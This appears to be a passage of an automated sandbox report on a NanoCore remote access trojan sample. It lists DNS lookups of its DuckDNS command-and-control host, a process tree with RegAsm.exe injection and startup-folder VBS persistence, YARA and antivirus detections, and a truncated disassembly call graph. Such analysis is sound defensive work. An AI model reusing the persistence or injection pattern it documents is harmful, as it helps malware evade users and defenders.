      May 19, 2022 05:21:04.217644930 CEST8.8.8.8192.168.2.40x30eaNo error (0)dinolachy.duckdns.org192.169.69.25A (IP address)IN (0x0001)
      May 19, 2022 05:21:08.867835999 CEST8.8.8.8192.168.2.40xa247No error (0)dinolachy.duckdns.org192.169.69.25A (IP address)IN (0x0001)
      May 19, 2022 05:21:13.527236938 CEST8.8.8.8192.168.2.40x5cdeNo error (0)dinolachy.duckdns.org192.169.69.25A (IP address)IN (0x0001)

      Statistics

      CPU Usage

      Click to jump to process

      Memory Usage

      Click to jump to process

      High Level Behavior Distribution

      Click to dive into process behavior distribution

      Behavior

      Click to jump to process

      System Behavior

      General

      Target ID:0
      Start time:05:19:17
      Start date:19/05/2022
      Path:C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exe
      Wow64 process (32bit):true
      Commandline:"C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exe"
      Imagebase:0x260000
      File size:409169 bytes
      MD5 hash:A93162E62B49A591E0D481E030FFC9EA
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Yara matches:
      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.269192497.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000000.00000002.269192497.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
      • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.269192497.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
      • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000000.00000002.269192497.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
      • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.269192497.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
      Reputation:low

      General

      Target ID:1
      Start time:05:19:18
      Start date:19/05/2022
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff647620000
      File size:625664 bytes
      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Target ID:3
      Start time:05:19:25
      Start date:19/05/2022
      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      Wow64 process (32bit):true
      Commandline:"C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exe"
      Imagebase:0xa90000
      File size:64616 bytes
      MD5 hash:6FD7592411112729BF6B1F2F6C34899F
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:.Net C# or VB.NET
      Yara matches:
      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.513573670.00000000056A0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000003.00000002.513573670.00000000056A0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
      • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.513573670.00000000056A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
      • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000003.00000002.513573670.00000000056A0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.509119262.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Florian Roth
      • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.509119262.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
      • Rule: NanoCore, Description: unknown, Source: 00000003.00000002.509119262.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000000.266056234.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Florian Roth
      • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000000.266056234.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
      • Rule: NanoCore, Description: unknown, Source: 00000003.00000000.266056234.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
      • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.510200651.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.513552281.0000000005650000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000003.00000002.513552281.0000000005650000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
      • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000003.00000002.513552281.0000000005650000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
      • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.511424469.0000000003DD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
      • Rule: NanoCore, Description: unknown, Source: 00000003.00000002.511424469.0000000003DD9000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
      Reputation:high

      General

      Target ID:6
      Start time:05:19:35
      Start date:19/05/2022
      Path:C:\Windows\System32\wscript.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ople.exe.vbs"
      Imagebase:0x7ff784990000
      File size:163840 bytes
      MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Target ID:7
      Start time:05:19:36
      Start date:19/05/2022
      Path:C:\Users\user\AppData\Roaming\etwa\ople.exe.exe
      Wow64 process (32bit):true
      Commandline:C:\Users\user\AppData\Roaming\etwa\ople.exe.exe
      Imagebase:0xab0000
      File size:409170 bytes
      MD5 hash:CA51A0A9E3EF192B26D9818DC4EC5FF0
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Yara matches:
      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.301093367.0000000002A00000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
      • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000007.00000002.301093367.0000000002A00000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
      • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.301093367.0000000002A00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
      • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000007.00000002.301093367.0000000002A00000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
      • Rule: NanoCore, Description: unknown, Source: 00000007.00000002.301093367.0000000002A00000.00000004.00001000.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
      Antivirus matches:
      • Detection: 100%, Avira
      • Detection: 100%, Joe Sandbox ML
      • Detection: 63%, ReversingLabs
      Reputation:low

      General

      Target ID:8
      Start time:05:19:36
      Start date:19/05/2022
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff647620000
      File size:625664 bytes
      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Target ID:12
      Start time:05:19:40
      Start date:19/05/2022
      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      Wow64 process (32bit):true
      Commandline:C:\Users\user\AppData\Roaming\etwa\ople.exe.exe
      Imagebase:0xca0000
      File size:64616 bytes
      MD5 hash:6FD7592411112729BF6B1F2F6C34899F
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:.Net C# or VB.NET
      Yara matches:
      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000000.296930304.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Florian Roth
      • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000000.296930304.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
      • Rule: NanoCore, Description: unknown, Source: 0000000C.00000000.296930304.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
      • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.319192237.0000000003F99000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
      • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.319192237.0000000003F99000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
      • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.318213068.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Florian Roth
      • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.318213068.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
      • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.318213068.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
      • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.318967216.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
      • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.318967216.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
      Reputation:high

      Disassembly

      Reset < >

        Execution Graph

        Execution Coverage:22.9%
        Dynamic/Decrypted Code Coverage:15.6%
        Signature Coverage:2.6%
        Total number of Nodes:1973
        Total number of Limit Nodes:49
        execution_graph 8121 264666 8122 264669 8121->8122 8123 264758 _abort 38 API calls 8122->8123 8124 264675 8123->8124 8421 261fe6 8422 261fee pre_c_initialization 8421->8422 8439 263f7d 8422->8439 8424 261ff9 pre_c_initialization 8446 2622ce 8424->8446 8426 262082 8427 262598 ___scrt_fastfail 4 API calls 8426->8427 8429 262089 ___scrt_initialize_default_local_stdio_options 8427->8429 8428 26200e __RTC_Initialize 8428->8426 8451 26246f 8428->8451 8431 262027 pre_c_initialization 8431->8426 8432 262038 8431->8432 8454 26252a InitializeSListHead 8432->8454 8434 26203d pre_c_initialization 8455 262536 8434->8455 8436 262060 pre_c_initialization 8461 26403f 8436->8461 8438 26206b pre_c_initialization 8440 263faf 8439->8440 8441 263f8c 8439->8441 8440->8424 8441->8440 8442 26501f __dosmaperr 20 API calls 8441->8442 8443 263f9f 8442->8443 8444 264f63 _abort 26 API calls 8443->8444 8445 263faa 8444->8445 8445->8424 8447 2622dc 8446->8447 8450 2622e1 ___scrt_initialize_onexit_tables 8446->8450 8448 262598 ___scrt_fastfail 4 API calls 8447->8448 8447->8450 8449 262364 8448->8449 8450->8428 8468 262434 8451->8468 8454->8434 8506 2645db 8455->8506 8457 262547 8458 26254e 8457->8458 8459 262598 ___scrt_fastfail 4 API calls 8457->8459 8458->8436 8460 262556 8459->8460 8462 264c4a _abort 38 API calls 8461->8462 8464 26404a 8462->8464 8463 264082 8463->8438 8464->8463 8465 26501f __dosmaperr 20 API calls 8464->8465 8466 264077 8465->8466 8467 264f63 _abort 26 API calls 8466->8467 8467->8463 8469 262451 8468->8469 8470 262458 8468->8470 8474 26442f 8469->8474 8477 26449f 8470->8477 8473 262456 8473->8431 8475 26449f __onexit 29 API calls 8474->8475 8476 264441 8475->8476 8476->8473 8480 2641a6 8477->8480 8483 2640dc 8480->8483 8482 2641ca 8482->8473 8484 2640e8 ___scrt_is_nonwritable_in_current_image 8483->8484 8491 2661a3 EnterCriticalSection 8484->8491 8486 2640f6 8492 2642ee 8486->8492 8488 264103 8502 264121 8488->8502 8490 264114 ___scrt_is_nonwritable_in_current_image 8490->8482 8491->8486 8493 26430c 8492->8493 8496 264304 pre_c_initialization __crt_fast_encode_pointer 8492->8496 8494 264365 8493->8494 8495 26731c __onexit 29 API calls 8493->8495 8493->8496 8494->8496 8497 26731c __onexit 29 API calls 8494->8497 8498 26435b 8495->8498 8496->8488 8499 26437b 8497->8499 8501 264676 ___free_lconv_mon 20 API calls 8498->8501 8500 264676 ___free_lconv_mon 20 API calls 8499->8500 8500->8496 8501->8494 8505 2661eb LeaveCriticalSection 8502->8505 8504 26412b 8504->8490 8505->8504 8507 264619 pre_c_initialization 8506->8507 8509 2645f9 pre_c_initialization 8506->8509 8507->8457 8508 26501f __dosmaperr 20 API calls 8510 26460f 8508->8510 8509->8508 8511 264f63 _abort 26 API calls 8510->8511 8511->8507 8512 26a3e6 IsProcessorFeaturePresent 7651 263e27 7654 26463a 7651->7654 7655 264646 _abort 7654->7655 7656 264c4a _abort 38 API calls 7655->7656 7659 26464b 7656->7659 7657 264758 _abort 38 API calls 7658 264675 7657->7658 7659->7657 6540 2620a4 6541 2620b0 ___scrt_is_nonwritable_in_current_image 6540->6541 6565 262295 6541->6565 6543 2620b7 6545 2620e0 6543->6545 6592 262598 IsProcessorFeaturePresent 6543->6592 6551 26211f ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 6545->6551 6576 263cb1 6545->6576 6549 2620ff ___scrt_is_nonwritable_in_current_image 6550 26217f 6584 263c3c 6550->6584 6551->6550 6596 263f2f 6551->6596 6559 2621b0 6560 2621b9 6559->6560 6607 263f0a 6559->6607 6610 26240c 6560->6610 6566 26229e 6565->6566 6616 26280b IsProcessorFeaturePresent 6566->6616 6570 2622af 6571 2622b3 6570->6571 6627 2645b7 6570->6627 6571->6543 6574 2622ca 6574->6543 6577 263cc8 6576->6577 6578 2629bb _ValidateLocalCookies 5 API calls 6577->6578 6579 2620f9 6578->6579 6579->6549 6580 263c55 6579->6580 6581 263c84 6580->6581 6582 2629bb _ValidateLocalCookies 5 API calls 6581->6582 6583 263cad 6582->6583 6583->6551 6585 263c45 6584->6585 6586 262193 6584->6586 6898 263983 6585->6898 6588 261000 GetConsoleWindow SetWindowPos 6586->6588 6589 2619e0 VirtualProtect 6588->6589 6591 261f00 6589->6591 6602 2626b6 GetModuleHandleW 6591->6602 6593 2625ae ___scrt_fastfail 6592->6593 6594 262656 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6593->6594 6595 2626a0 6594->6595 6595->6543 6597 263f57 pre_c_initialization _abort 6596->6597 6597->6550 6598 264c4a _abort 38 API calls 6597->6598 6601 26464b 6598->6601 6599 264758 _abort 38 API calls 6600 264675 6599->6600 6601->6599 6603 2621a6 6602->6603 6603->6559 6604 263f67 6603->6604 6605 263d28 _abort 28 API calls 6604->6605 6606 263f78 6605->6606 6606->6559 6608 263d28 _abort 28 API calls 6607->6608 6609 263f15 6608->6609 6609->6560 6611 262418 6610->6611 6612 2621c2 6611->6612 7308 2645c9 6611->7308 6612->6549 6615 262cbf ___vcrt_uninitialize 8 API calls 6615->6612 6617 2622aa 6616->6617 6618 262c96 6617->6618 6619 262c9b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 6618->6619 6638 263009 6619->6638 6623 262cb1 6624 262cbc 6623->6624 6652 263045 6623->6652 6624->6570 6626 262ca9 6626->6570 6693 2673af 6627->6693 6630 262cbf 6631 262cd9 6630->6631 6632 262cc8 6630->6632 6631->6571 6633 262fee ___vcrt_uninitialize_ptd 6 API calls 6632->6633 6634 262ccd 6633->6634 6635 263045 ___vcrt_uninitialize_locks DeleteCriticalSection 6634->6635 6636 262cd2 6635->6636 6894 2632e3 6636->6894 6639 263012 6638->6639 6641 26303b 6639->6641 6642 262ca5 6639->6642 6656 263263 6639->6656 6643 263045 ___vcrt_uninitialize_locks DeleteCriticalSection 6641->6643 6642->6626 6644 262fbb 6642->6644 6643->6642 6674 2631b2 6644->6674 6646 262fc5 6647 262fd0 6646->6647 6679 263226 6646->6679 6647->6623 6649 262fde 6650 262feb 6649->6650 6684 262fee 6649->6684 6650->6623 6653 26306f 6652->6653 6654 263050 6652->6654 6653->6626 6655 26305a DeleteCriticalSection 6654->6655 6655->6653 6655->6655 6661 263091 6656->6661 6658 26327d 6659 26329a InitializeCriticalSectionAndSpinCount 6658->6659 6660 263286 6658->6660 6659->6660 6660->6639 6664 2630c1 6661->6664 6666 2630c5 __crt_fast_encode_pointer 6661->6666 6662 2630e5 6665 2630f1 GetProcAddress 6662->6665 6662->6666 6664->6662 6664->6666 6667 263131 6664->6667 6665->6666 6666->6658 6668 26314e 6667->6668 6669 263159 LoadLibraryExW 6667->6669 6668->6664 6670 263175 GetLastError 6669->6670 6671 26318d 6669->6671 6670->6671 6672 263180 LoadLibraryExW 6670->6672 6671->6668 6673 2631a4 FreeLibrary 6671->6673 6672->6671 6673->6668 6675 263091 try_get_function 5 API calls 6674->6675 6676 2631cc 6675->6676 6677 2631e4 TlsAlloc 6676->6677 6678 2631d5 6676->6678 6678->6646 6680 263091 try_get_function 5 API calls 6679->6680 6681 263240 6680->6681 6682 26325a TlsSetValue 6681->6682 6683 26324f 6681->6683 6682->6683 6683->6649 6685 262ff8 6684->6685 6687 262ffe 6684->6687 6688 2631ec 6685->6688 6687->6647 6689 263091 try_get_function 5 API calls 6688->6689 6690 263206 6689->6690 6691 26321d TlsFree 6690->6691 6692 263212 6690->6692 6691->6692 6692->6687 6694 2673cc 6693->6694 6695 2673c8 6693->6695 6694->6695 6700 266b1f 6694->6700 6712 266a69 6694->6712 6717 2629bb 6695->6717 6697 2622bc 6697->6574 6697->6630 6701 266b2b ___scrt_is_nonwritable_in_current_image 6700->6701 6724 2661a3 EnterCriticalSection 6701->6724 6703 266b32 6725 2667da 6703->6725 6705 266b41 6711 266b50 6705->6711 6738 2669b3 GetStartupInfoW 6705->6738 6709 266b61 ___scrt_is_nonwritable_in_current_image 6709->6694 6710 266a69 2 API calls 6710->6711 6744 266b6c 6711->6744 6715 266a70 6712->6715 6713 266ab3 GetStdHandle 6713->6715 6714 266b1b 6714->6694 6715->6713 6715->6714 6716 266ac6 GetFileType 6715->6716 6716->6715 6718 2629c6 IsProcessorFeaturePresent 6717->6718 6719 2629c4 6717->6719 6721 262a08 6718->6721 6719->6697 6893 2629cc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6721->6893 6723 262aeb 6723->6697 6724->6703 6726 2667e6 ___scrt_is_nonwritable_in_current_image 6725->6726 6727 2667f3 6726->6727 6728 26680a 6726->6728 6755 26501f 6727->6755 6747 2661a3 EnterCriticalSection 6728->6747 6733 266816 6737 266842 6733->6737 6748 26672b 6733->6748 6735 266802 ___scrt_is_nonwritable_in_current_image 6735->6705 6761 266869 6737->6761 6739 266a62 6738->6739 6740 2669d0 6738->6740 6739->6710 6740->6739 6741 2667da 27 API calls 6740->6741 6742 2669f9 6741->6742 6742->6739 6743 266a27 GetFileType 6742->6743 6743->6742 6892 2661eb LeaveCriticalSection 6744->6892 6746 266b73 6746->6709 6747->6733 6764 26479b 6748->6764 6750 26674a 6778 264676 6750->6778 6752 26673d 6752->6750 6771 266502 6752->6771 6753 26679c 6753->6733 6812 264cce GetLastError 6755->6812 6758 264f63 6870 264ee8 6758->6870 6760 264f6f 6760->6735 6891 2661eb LeaveCriticalSection 6761->6891 6763 266870 6763->6735 6769 2647a8 _abort 6764->6769 6765 2647e8 6768 26501f __dosmaperr 19 API calls 6765->6768 6766 2647d3 RtlAllocateHeap 6767 2647e6 6766->6767 6766->6769 6767->6752 6768->6767 6769->6765 6769->6766 6784 2674c4 6769->6784 6799 26621c 6771->6799 6773 266529 6774 266547 InitializeCriticalSectionAndSpinCount 6773->6774 6777 266532 6773->6777 6774->6777 6775 2629bb _ValidateLocalCookies 5 API calls 6776 26655e 6775->6776 6776->6752 6777->6775 6779 264681 HeapFree 6778->6779 6780 2646aa __dosmaperr 6778->6780 6779->6780 6781 264696 6779->6781 6780->6753 6782 26501f __dosmaperr 18 API calls 6781->6782 6783 26469c GetLastError 6782->6783 6783->6780 6789 267508 6784->6789 6786 2629bb _ValidateLocalCookies 5 API calls 6787 267504 6786->6787 6787->6769 6788 2674da 6788->6786 6790 267514 ___scrt_is_nonwritable_in_current_image 6789->6790 6795 2661a3 EnterCriticalSection 6790->6795 6792 26751f 6796 267551 6792->6796 6794 267546 ___scrt_is_nonwritable_in_current_image 6794->6788 6795->6792 6797 2661eb _abort LeaveCriticalSection 6796->6797 6798 267558 6797->6798 6798->6794 6800 26624c __crt_fast_encode_pointer 6799->6800 6802 266248 6799->6802 6800->6773 6802->6800 6804 26626c 6802->6804 6805 2662b8 6802->6805 6803 266278 GetProcAddress 6803->6800 6804->6800 6804->6803 6806 2662d9 LoadLibraryExW 6805->6806 6811 2662ce 6805->6811 6807 2662f6 GetLastError 6806->6807 6808 26630e 6806->6808 6807->6808 6809 266301 LoadLibraryExW 6807->6809 6810 266325 FreeLibrary 6808->6810 6808->6811 6809->6808 6810->6811 6811->6802 6813 264ce7 6812->6813 6814 264ced 6812->6814 6831 266453 6813->6831 6816 26479b _abort 17 API calls 6814->6816 6818 264d44 SetLastError 6814->6818 6817 264cff 6816->6817 6819 264d07 6817->6819 6838 2664a9 6817->6838 6820 264d4d 6818->6820 6822 264676 ___free_lconv_mon 17 API calls 6819->6822 6820->6758 6824 264d0d 6822->6824 6827 264d3b SetLastError 6824->6827 6825 264d23 6845 264abc 6825->6845 6827->6820 6829 264676 ___free_lconv_mon 17 API calls 6830 264d34 6829->6830 6830->6818 6830->6827 6832 26621c _abort 5 API calls 6831->6832 6833 26647a 6832->6833 6834 266492 TlsGetValue 6833->6834 6835 266486 6833->6835 6834->6835 6836 2629bb _ValidateLocalCookies 5 API calls 6835->6836 6837 2664a3 6836->6837 6837->6814 6839 26621c _abort 5 API calls 6838->6839 6840 2664d0 6839->6840 6841 2664eb TlsSetValue 6840->6841 6844 2664df 6840->6844 6841->6844 6842 2629bb _ValidateLocalCookies 5 API calls 6843 264d1c 6842->6843 6843->6819 6843->6825 6844->6842 6850 264a94 6845->6850 6856 2649d4 6850->6856 6852 264ab8 6853 264a44 6852->6853 6862 2648d8 6853->6862 6855 264a68 6855->6829 6857 2649e0 ___scrt_is_nonwritable_in_current_image 6856->6857 6858 2661a3 _abort EnterCriticalSection 6857->6858 6859 2649ea 6858->6859 6860 264a10 _abort LeaveCriticalSection 6859->6860 6861 264a08 ___scrt_is_nonwritable_in_current_image 6860->6861 6861->6852 6863 2648e4 ___scrt_is_nonwritable_in_current_image 6862->6863 6864 2661a3 _abort EnterCriticalSection 6863->6864 6865 2648ee 6864->6865 6866 264bff _abort 20 API calls 6865->6866 6867 264906 6866->6867 6868 26491c _abort LeaveCriticalSection 6867->6868 6869 264914 ___scrt_is_nonwritable_in_current_image 6868->6869 6869->6855 6871 264cce _abort 20 API calls 6870->6871 6872 264efe 6871->6872 6873 264f5d 6872->6873 6875 264f0c 6872->6875 6881 264f73 IsProcessorFeaturePresent 6873->6881 6879 2629bb _ValidateLocalCookies 5 API calls 6875->6879 6876 264f62 6877 264ee8 _abort 26 API calls 6876->6877 6878 264f6f 6877->6878 6878->6760 6880 264f33 6879->6880 6880->6760 6882 264f7e 6881->6882 6885 264d99 6882->6885 6886 264db5 _abort ___scrt_fastfail 6885->6886 6887 264de1 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6886->6887 6888 264eb2 _abort 6887->6888 6889 2629bb _ValidateLocalCookies 5 API calls 6888->6889 6890 264ed0 GetCurrentProcess TerminateProcess 6889->6890 6890->6876 6891->6763 6892->6746 6893->6723 6895 263312 6894->6895 6896 2632ec 6894->6896 6895->6631 6896->6895 6897 2632fc FreeLibrary 6896->6897 6897->6896 6899 26398c 6898->6899 6904 2639a5 6898->6904 6900 263994 6899->6900 6905 2639b2 6899->6905 6900->6586 6902 26399c 6902->6900 6918 263b0b 6902->6918 6904->6586 6906 2639be 6905->6906 6907 2639bb 6905->6907 6928 2659ba 6906->6928 6907->6902 6913 264676 ___free_lconv_mon 20 API calls 6915 263a05 6913->6915 6914 2639db 6916 264676 ___free_lconv_mon 20 API calls 6914->6916 6915->6902 6917 2639d0 6916->6917 6917->6913 6919 263b18 6918->6919 6925 263b1d 6918->6925 6919->6904 6920 263b23 WideCharToMultiByte 6920->6925 6926 263b78 6920->6926 6921 26479b _abort 20 API calls 6921->6925 6922 263b7e 6924 264676 ___free_lconv_mon 20 API calls 6922->6924 6923 263b49 WideCharToMultiByte 6923->6922 6923->6925 6924->6926 6925->6920 6925->6921 6925->6922 6925->6923 6925->6926 6927 264676 ___free_lconv_mon 20 API calls 6925->6927 6926->6904 6927->6925 6929 2659c3 6928->6929 6931 2639c5 6928->6931 6962 2658b9 6929->6962 6932 265d94 GetEnvironmentStringsW 6931->6932 6933 265e01 6932->6933 6934 265dab 6932->6934 6935 265e07 FreeEnvironmentStringsW 6933->6935 6936 2639ca 6933->6936 6937 265db1 WideCharToMultiByte 6934->6937 6935->6936 6936->6917 6945 263a0b 6936->6945 6937->6933 6938 265dcd 6937->6938 6939 2646b0 __onexit 21 API calls 6938->6939 6940 265dd3 6939->6940 6941 265df0 6940->6941 6942 265dda WideCharToMultiByte 6940->6942 6943 264676 ___free_lconv_mon 20 API calls 6941->6943 6942->6941 6944 265dfe 6943->6944 6944->6933 6946 263a20 6945->6946 6947 26479b _abort 20 API calls 6946->6947 6957 263a47 6947->6957 6948 263aab 6949 264676 ___free_lconv_mon 20 API calls 6948->6949 6950 263ac5 6949->6950 6950->6914 6951 26479b _abort 20 API calls 6951->6957 6952 263aad 7302 263adc 6952->7302 6956 264676 ___free_lconv_mon 20 API calls 6956->6948 6957->6948 6957->6951 6957->6952 6958 263acf 6957->6958 6960 264676 ___free_lconv_mon 20 API calls 6957->6960 7293 2646fe 6957->7293 6959 264f73 _abort 11 API calls 6958->6959 6961 263adb 6959->6961 6960->6957 6982 264c4a GetLastError 6962->6982 6964 2658c6 7002 2659d8 6964->7002 6966 2658ce 7011 26564d 6966->7011 6969 2658e5 6969->6931 6971 2658f6 6972 265928 6971->6972 7025 265a7a 6971->7025 6974 264676 ___free_lconv_mon 20 API calls 6972->6974 6974->6969 6976 265923 6977 26501f __dosmaperr 20 API calls 6976->6977 6977->6972 6978 26596c 6978->6972 7035 265523 6978->7035 6979 265940 6979->6978 6980 264676 ___free_lconv_mon 20 API calls 6979->6980 6980->6978 6983 264c60 6982->6983 6986 264c66 6982->6986 6985 266453 _abort 11 API calls 6983->6985 6984 26479b _abort 20 API calls 6989 264c78 6984->6989 6985->6986 6986->6984 6987 264cb5 SetLastError 6986->6987 6987->6964 6988 264c80 6991 264676 ___free_lconv_mon 20 API calls 6988->6991 6989->6988 6990 2664a9 _abort 11 API calls 6989->6990 6992 264c95 6990->6992 6993 264c86 6991->6993 6992->6988 6994 264c9c 6992->6994 6995 264cc1 SetLastError 6993->6995 6996 264abc _abort 20 API calls 6994->6996 7038 264758 6995->7038 6998 264ca7 6996->6998 7000 264676 ___free_lconv_mon 20 API calls 6998->7000 7001 264cae 7000->7001 7001->6987 7001->6995 7003 2659e4 ___scrt_is_nonwritable_in_current_image 7002->7003 7004 264c4a _abort 38 API calls 7003->7004 7006 2659ee 7004->7006 7007 265a72 ___scrt_is_nonwritable_in_current_image 7006->7007 7008 264758 _abort 38 API calls 7006->7008 7010 264676 ___free_lconv_mon 20 API calls 7006->7010 7148 2661a3 EnterCriticalSection 7006->7148 7149 265a69 7006->7149 7007->6966 7008->7006 7010->7006 7153 2647f8 7011->7153 7014 265680 7016 265685 GetACP 7014->7016 7017 265697 7014->7017 7015 26566e GetOEMCP 7015->7017 7016->7017 7017->6969 7018 2646b0 7017->7018 7019 2646ee 7018->7019 7024 2646be _abort 7018->7024 7020 26501f __dosmaperr 20 API calls 7019->7020 7022 2646ec 7020->7022 7021 2646d9 HeapAlloc 7021->7022 7021->7024 7022->6971 7023 2674c4 _abort 7 API calls 7023->7024 7024->7019 7024->7021 7024->7023 7026 26564d 40 API calls 7025->7026 7027 265a99 7026->7027 7028 265aa0 7027->7028 7030 265b0f ___scrt_fastfail 7027->7030 7032 265aea IsValidCodePage 7027->7032 7029 2629bb _ValidateLocalCookies 5 API calls 7028->7029 7031 26591b 7029->7031 7189 265725 GetCPInfo 7030->7189 7031->6976 7031->6979 7032->7028 7033 265afc GetCPInfo 7032->7033 7033->7028 7033->7030 7257 2654e0 7035->7257 7037 265547 7037->6972 7049 267646 7038->7049 7041 264768 7043 264772 IsProcessorFeaturePresent 7041->7043 7044 264790 7041->7044 7046 26477d 7043->7046 7079 263f19 7044->7079 7048 264d99 _abort 8 API calls 7046->7048 7048->7044 7082 2675b4 7049->7082 7052 2676a1 7053 2676ad _abort 7052->7053 7054 264cce _abort 